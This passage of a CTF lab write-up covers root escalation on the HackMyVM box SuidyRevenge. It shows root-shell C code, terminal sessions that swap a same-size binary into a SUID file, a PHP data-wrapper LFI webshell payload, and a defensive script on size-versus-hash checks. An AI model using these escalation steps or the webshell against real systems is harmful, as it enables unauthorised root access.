Kali:<\/p>\n<pre><code class=\"language-c\">#include &lt;stdlib.h&gt;\n#include &lt;unistd.h&gt;   \/* prototypes for setuid\/setgid; silences the warnings without changing the generated code *\/\n\nint main(void){\n    setuid(0);           \/* only succeeds once root&#039;s job has re-applied the SUID bit *\/\n    setgid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p>That comes out at <code>16056<\/code> bytes. Adding a line to grow it:<\/p>\n<pre><code class=\"language-c\">#include &lt;stdlib.h&gt;\n#include &lt;unistd.h&gt;\n\nint main(void){\n    setuid(0);\n    setgid(0);\n    setuid(0);           \/* redundant call, added only to change the size *\/\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p>That does not get anywhere: one extra call barely moves the file size, which is dominated by the ELF headers, PLT\/GOT entries and section alignment, and the gcc and libc on Kali lay the binary out differently from the target&#039;s gcc 8 in any case. Build on the target instead:<\/p>\n<pre><code class=\"language-bash\">suidy@suidyrevenge:\/home\/suidy$ ls\nnote.txt  suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ vi suid.c\nsuidy@suidyrevenge:\/home\/suidy$ gcc suid.c -o suid\ngcc: error trying to 
exec &#039;cc1&#039;: execvp: No such file or directory\nsuidy@suidyrevenge:\/home\/suidy$ gcc\ngcc: fatal error: no input files\ncompilation terminated.<\/code><\/pre>\n<p>The same error as theuser...<\/p>\n<pre><code class=\"language-bash\">theuser@suidyrevenge:~$ vi exp.c\ntheuser@suidyrevenge:~$ gcc exp.c -o exp\ngcc: error trying to exec &#039;cc1&#039;: execvp: No such file or directory<\/code><\/pre>\n<p>The <code>gcc<\/code> driver is installed but cannot find the compiler proper, <code>cc1<\/code>, which lives under <code>\/usr\/lib\/gcc\/x86_64-linux-gnu\/8<\/code>. Putting that directory on <code>PATH<\/code> is enough. The implicit-declaration warnings appear because the <code>exp.c<\/code> on the box has no <code>#include &lt;unistd.h&gt;<\/code>; they do not affect the build:<\/p>\n<pre><code class=\"language-bash\">theuser@suidyrevenge:~$ gcc exp.c -o exp\ngcc: error trying to exec &#039;cc1&#039;: execvp: No such file or directory\ntheuser@suidyrevenge:~$ find \/usr\/ -name &quot;*cc1*&quot;\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/libcc1.so\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/plugin\/libcc1plugin.so.0\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/plugin\/libcc1plugin.so\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/plugin\/libcc1plugin.so.0.0.0\n\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/cc1\n\/usr\/lib\/x86_64-linux-gnu\/libcc1.so.0\n\/usr\/lib\/x86_64-linux-gnu\/libcc1.so.0.0.0\n\/usr\/share\/doc\/libgcc1\n\/usr\/share\/doc\/libisccc161\n\/usr\/share\/doc\/libcc1-0\n\/usr\/share\/lintian\/overrides\/libgcc1\n\/usr\/share\/terminfo\/x\/xterm+pcc1\ntheuser@suidyrevenge:~$ export PATH=$PATH:\/usr\/lib\/gcc\/x86_64-linux-gnu\/8\/\ntheuser@suidyrevenge:~$ gcc exp.c -o exp\nexp.c: In function \u2018main\u2019:\nexp.c:4:5: warning: implicit declaration of function \u2018setuid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n     setuid(0);\n     ^~~~~~\n     setenv\nexp.c:5:5: warning: implicit declaration of function \u2018setgid\u2019; did you mean \u2018setenv\u2019? 
[-Wimplicit-function-declaration]\n     setgid(0);\n     ^~~~~~\n     setenv\ntheuser@suidyrevenge:~$ ls -la\ntotal 56\ndrwxrwx--- 3 theuser theuser  4096 Apr 18 06:33 .\ndrwxr-xr-x 8 root    root     4096 Oct  1  2020 ..\n-rw------- 1 theuser theuser    33 Oct  2  2020 .bash_history\n-rwxrwx--- 1 theuser theuser   220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 theuser theuser  3526 Oct  1  2020 .bashrc\n-rwxr-xr-x 1 theuser theuser 16712 Apr 18 06:33 exp\n-rw-r--r-- 1 theuser theuser   103 Apr 18 06:31 exp.c\ndrwxr-xr-x 3 theuser theuser  4096 Oct  1  2020 .local\n-rwxrwx--- 1 theuser theuser   807 Oct  1  2020 .profile\n-rw-r----- 1 theuser theuser  1961 Oct  2  2020 user.txt<\/code><\/pre>\n<p>There it is: 16712 bytes, the same size as the original. Copy it over <code>suidyyyyy<\/code> in place, with <code>cp<\/code> onto the existing file rather than <code>rm<\/code> and recreate: the inode keeps its root owner, whereas a theuser-owned file would at best become SUID theuser. Writing to a set-id file clears its set-id bits, as the listing shows (<code>rwxrwx---<\/code>), so the first two runs just open another theuser shell. The copy pays off once root&#039;s periodic job (it is not in <code>\/etc\/crontab<\/code>, so it is scheduled elsewhere; <code>\/root\/script.sh<\/code> below) compares the sizes, finds them equal and re-applies <code>chmod +s<\/code>:<\/p>\n<pre><code class=\"language-bash\">theuser@suidyrevenge:~$ cd ..\/\ntheuser@suidyrevenge:\/home$ cd suidy\/\ntheuser@suidyrevenge:\/home\/suidy$ cp \/home\/theuser\/exp suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ ls -la\ntotal 56\ndrwxrwxr-x 3 suidy suidy    4096 Apr 18 06:25 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 suidy theuser    94 Apr 18 06:24 a.c\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwxrwx--- 1 root  theuser 16712 Apr 18 06:36 suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ .\/suidyyyyy \ntheuser@suidyrevenge:\/home\/suidy$ ls -la\ntotal 56\ndrwxrwxr-x 3 suidy suidy    4096 Apr 18 06:25 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 suidy theuser    94 Apr 18 06:24 a.c\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  
1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsrws--- 1 root  theuser 16712 Apr 18 06:36 suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ .\/suidyyyyy \nroot@suidyrevenge:\/home\/suidy# cd \/root\nroot@suidyrevenge:\/root# ls -la\ntotal 56\ndrwx------  3 root root  4096 Oct  2  2020 .\ndrwxr-xr-x 18 root root  4096 Oct  1  2020 ..\n-rw-------  1 root root   127 Oct  2  2020 .bash_history\n-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root  4096 Oct  1  2020 .local\n-rw-r--r--  1 root root   148 Aug 17  2015 .profile\n-rw-r-----  1 root root  1961 Oct  2  2020 root.txt\n-rwxr-x--x  1 root root   517 Oct  1  2020 script.sh\n-rw-r--r--  1 root root    66 Oct  1  2020 .selected_editor\n-rwxr-xr-x  1 root root 16712 Oct  2  2020 suidyyyyy\nroot@suidyrevenge:\/root# cat script.sh \nFILE=\/home\/suidy\/suidyyyyy\nif [ -f &quot;$FILE&quot; ]; then\necho &quot;&quot;\n        else \n   cp \/root\/suidyyyyy \/home\/suidy\n   chown root:theuser \/home\/suidy\/suidyyyyy\n   chmod 770 \/home\/suidy\/suidyyyyy\n   chmod +s \/home\/suidy\/suidyyyyy\n\nfi\n\nif [ $(stat -c%s \/root\/suidyyyyy) -ne $(stat -c%s \/home\/suidy\/suidyyyyy) ]; then \n   echo &quot;They&#039;re different.&quot;\n   cp \/root\/suidyyyyy \/home\/suidy\n   chown root:theuser \/home\/suidy\/suidyyyyy\n   chmod 770 \/home\/suidy\/suidyyyyy\n   chmod +s \/home\/suidy\/suidyyyyy\nelse\nchmod +s \/home\/suidy\/suidyyyyy\nfi\n\nroot@suidyrevenge:\/root# cat root.txt \n\n                                   .     **                                     \n                                *           *.                                  
\n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           
**                                 \n                                  **      ,*,                                   \n                                     ** *,                                      \n\nHMVvoilarootlala<\/code><\/pre>\n<p>Got the flag!!!<\/p>\n<h2>Extra takeaways<\/h2>\n<h3>Master Mo's LFI read<\/h3>\n<p>In <a href=\"https:\/\/tryhackmyoffsecbox.github.io\/Target-Machines-WriteUp\/docs\/HackMyVM\/Machines\/SuidyRevenge\/\">Master Mo's writeup<\/a>, the LFI is fed a PHP <code>data:<\/code> stream-wrapper URI, so the include evaluates an attacker-supplied webshell without anything being written to disk (this only works when <code>allow_url_include<\/code> is enabled):<\/p>\n<pre><code class=\"language-bash\">payload:?file=data:text\/plain,&lt;?php @eval($_POST[&#039;a&#039;]) ?&gt;<\/code><\/pre>\n<p>I haven't used this in a long time and had forgotten it, so noting it down here!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846310.jpg\" alt=\"img\" style=\"zoom:50%;\" \/><\/p>\n<h3>The group owner's solution<\/h3>\n<p>The group owner also exploited the gap between the script's commands to catch a root shell directly; it is a very clever solution, and I'll reproduce it briefly here:<\/p>\n<pre><code class=\"language-bash\">suidy@suidyrevenge:\/home\/suidy$ vi exploit.c\nsuidy@suidyrevenge:\/home\/suidy$ gcc 
exploit.c -o exploit\nexploit.c: In function \u2018main\u2019:\nexploit.c:3:5: warning: implicit declaration of function \u2018setuid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n     setuid(0);\n     ^~~~~~\n     setenv\nsuidy@suidyrevenge:\/home\/suidy$ ls -la\ntotal 104\ndrwxrwxr-x 3 suidy suidy    4096 Apr 18 06:43 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 suidy theuser    94 Apr 18 06:24 a.c\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\n-rwxr-xr-x 1 suidy theuser 16664 Apr 18 06:43 exploit\n-rw-r--r-- 1 suidy theuser    77 Apr 18 06:43 exploit.c\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxr-xr-x 1 suidy theuser 16712 Apr 18 06:42 payload\n-rw-r--r-- 1 root  root       92 Apr 18 06:41 payload.c\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsr-sr-x 1 root  root    16712 Apr 18 06:40 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ ls -l exploit\n-rwxr-xr-x 1 suidy theuser 16664 Apr 18 06:43 exploit\nsuidy@suidyrevenge:\/home\/suidy$ ls -l suidyyyyy \n-rwsr-sr-x 1 root root 16712 Apr 18 06:40 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ cp exploit suidyyyyy \ncp: cannot create regular file &#039;suidyyyyy&#039;: Permission denied\nsuidy@suidyrevenge:\/home\/suidy$ rm suidyyyyy \nrm: remove write-protected regular file &#039;suidyyyyy&#039;? 
\nsuidy@suidyrevenge:\/home\/suidy$ ls -la\ntotal 104\ndrwxrwxr-x 3 suidy suidy    4096 Apr 18 06:43 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 suidy theuser    94 Apr 18 06:24 a.c\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\n-rwxr-xr-x 1 suidy theuser 16664 Apr 18 06:43 exploit\n-rw-r--r-- 1 suidy theuser    77 Apr 18 06:43 exploit.c\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxr-xr-x 1 suidy theuser 16712 Apr 18 06:42 payload\n-rw-r--r-- 1 root  root       92 Apr 18 06:41 payload.c\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsr-sr-x 1 root  root    16712 Apr 18 06:40 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ rm suidyyyyy \nrm: remove write-protected regular file &#039;suidyyyyy&#039;? y\nsuidy@suidyrevenge:\/home\/suidy$ cp exploit suidyyyyy \nsuidy@suidyrevenge:\/home\/suidy$ ls -l suidyyyyy \n-rwxr-xr-x 1 suidy theuser 16664 Apr 18 06:44 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy \nsuidy@suidyrevenge:\/home\/suidy$ \nsuidy@suidyrevenge:\/home\/suidy$ \nsuidy@suidyrevenge:\/home\/suidy$ \nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nroot@suidyrevenge:\/home\/suidy# 
.\/suidyyyyy\nroot@suidyrevenge:\/home\/suidy# cat exploit.c \n#include&lt;stdlib.h&gt;\nint main(void){\n    setuid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>SuidyRevenge Information gathering Port scan rustscan -a 192.168.0.140 &#8212; -A  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-582","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/582","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=582"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/582\/revisions"}],"predecessor-version":[{"id":588,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/582\/revisions\/588"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=582"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=582"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=582"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
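The root cause behind the theuser route is visible in script.sh: it decides whether /home/suidy/suidyyyyy was tampered with by comparing only `stat -c%s` byte counts, leaves the copy group-writable (`chmod 770` with group theuser), and re-applies `chmod +s` unconditionally. The following is an added example, not code from the writeup or from the box. It constructs two same-size files in a temporary directory to show that the size check passes while a content hash fails, and sketches a hardened restore step (my `restore_if_tampered` helper, not the box's script) that decides by content and sets mode 4750 so the group can execute the binary but not write to it. File names and contents are constructed placeholders; no real SUID binary is involved.

```shell
#!/bin/sh
# Added example: why a byte-count comparison is not an integrity check.
# Mirrors the logic of the box's script.sh on constructed files only.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed stand-ins for /root/suidyyyyy (trusted) and /home/suidy/suidyyyyy (exposed).
TRUSTED="$WORK/trusted"
EXPOSED="$WORK/exposed"
printf 'setuid(0); system("/bin/sh");' > "$TRUSTED"
# Same byte count as TRUSTED, different bytes: the analogue of the padded exp binary.
printf 'setgid(0); system("/bin/sh");' > "$EXPOSED"

# The check script.sh actually performs: byte count only (stat -c%s in the original).
size_matches() {
    [ "$(wc -c < "$1" | tr -d ' ')" -eq "$(wc -c < "$2" | tr -d ' ')" ]
}

# SHA-256 of a file's content; falls back to shasum where sha256sum is absent.
file_digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum < "$1"
    else
        shasum -a 256 < "$1"
    fi | cut -d' ' -f1
}

# The check it should perform: compare content, not size.
hash_matches() {
    [ "$(file_digest "$1")" = "$(file_digest "$2")" ]
}

# Hardened restore step (assumption: this replaces the cp/chown/chmod block).
# Returns 0 if the exposed copy was replaced, 1 if it was already intact.
# Mode 4750 keeps the setuid bit and group execute, but removes group write, so
# an unprivileged group member can neither swap the content nor get the bit
# cleared-and-restored as in the writeup. The chown root:theuser step of the
# original script would precede the chmod in a real deployment.
restore_if_tampered() {
    trusted=$1
    exposed=$2
    if hash_matches "$trusted" "$exposed"; then
        return 1
    fi
    cp "$trusted" "$exposed"
    chmod 4750 "$exposed"
    return 0
}

size_matches "$TRUSTED" "$EXPOSED" && echo "size check: passes (swap undetected)"
hash_matches "$TRUSTED" "$EXPOSED" || echo "hash check: fails (swap detected)"
restore_if_tampered "$TRUSTED" "$EXPOSED" && echo "exposed copy restored from trusted"
hash_matches "$TRUSTED" "$EXPOSED" && echo "hash check: passes after restore"
ls -l "$EXPOSED"
```

Run it as any user; the final listing shows `-rwsr-x---`, i.e. the restored copy carries the setuid bit but no group write bit, which is the property the original `chmod 770` threw away.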